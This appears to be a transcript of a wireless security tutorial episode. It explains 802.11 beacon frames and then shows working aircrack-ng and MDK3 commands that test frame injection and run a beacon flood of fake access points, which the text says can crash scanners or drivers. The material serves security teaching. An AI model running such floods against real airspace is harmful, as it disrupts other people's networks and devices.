As you recall from last time, the beacon frame is one of the four types of management frames. The other three being association, authentication and probes, which we'll be getting into shortly.

Now the beacon frame is a special kind of management frame as it contains information about the network. This brings us to the terms:

Beacon frames or simple beacons are transmitted periodically by base stations or access points to announce the presence of wireless networks. The beacon frame is made up of several parts, including:

Whether the station is acting in ad-hoc or infrastructure mode (also known as managed mode)

The SSID or network name. We'll be getting more into service sets of 802.11 networks but for now the SSID is a 32 character, typically human-readable string that uniquely identifies the network.

The Timestamp

And capability information such as:

Channel Information

Supported data rates

Typically access points are setup the broadcast their beacons every 10 seconds. This can add quite a bit of overhead so for improved performance on networks where not a lot of clients are connecting and disconnecting, like a home network, this setting is often changed to be much higher.

MDK3 is a tool that exploits weaknesses in 802.11 protocols. It was created by ASPj with the help of the aircrack-ng team and libraries. MDK3 can be found at Pedro Larig's homepage and is built in to the latest version of BackTrack from backtrack-linux.org.

Today we're using MDK3 in our practical example of transmitting and analyzing beacon frames.

To achieve this we'll first we'll need a card capable of raw frame injection. In order to test whether our card has this capability we'll use the aireplay tool which is part of the aircrack-ng suite.

Aireplay-ng is a tool for injecting wireless frames and can accomplish 10 basic WiFi attacks, including deauthentication, fake authentication, fragmentation and more. We'll be getting more in depth with the the aireplay-ng tool soon, but for today we'll be using mode 9, also known as test mode.

Now before we can use either aireplay-ng or MDK3 we'll need to bring up a monitor interface for our card, or set our card in monitor mode. If you recall from a previous episode the easiest way to do this is with the command airmon-ng start and our interface.

airmon-ng start wlan2

Now that our card has been set to monitor mode and we have the interface mon0 we can proceed to test our NIC.

Issuing aireplay-ng -9 (or --test) and our wireless interface (which in our case is wlan2) we can test to see whether or not our radio can handle raw frame injection.

aireplay-ng -9 wlan2

Our test is complete and we can see that aireplay-ng reports "injection is working"

Now on to MDK3, which is capable of performing many modes of attack. Issuing mdk3 at the command prompt will display a brief description of them.

mdk3 | more

Today we're focusing on the beacon flood mode. For more information on any mode issue mdk3 --help and the mode. So we'll issue

mdk3 --help b

Alternatively we could issue mdk3 --fullhelp for information on all attack modes.

So now finally to craft our beacon flood we can see here that the options -f will read SSIDs from a text file, -g will show that they're using the 802.11g protocol at 54 Mbps, -a will show them as having WPA enabled using AES encryption, and -c will let us specify a channel.

Thankfully I already have a text file full of SSIDs handy so let's just issue

mdk3 mon0 b -f ssid.list -g -a -c 11

Now as you can see mdk3 is transmitting hundreds of beacons on channel 11 for the access points I've specified.

We can verify this using our other wireless interface by scanning for all nearby networks with the command:

iwlist wlan0 scan | grep ESSID

Now Similar to fuzzing, this sort of attack can sometimes break wifi scanners or network interface drivers. And with a specially crafted ssid list I'm sure you can come up with your own fun.

Mind you all of these BSSIDs or mac addresses are random and there's no chance of anyong actually associating with these base stations. At least not now.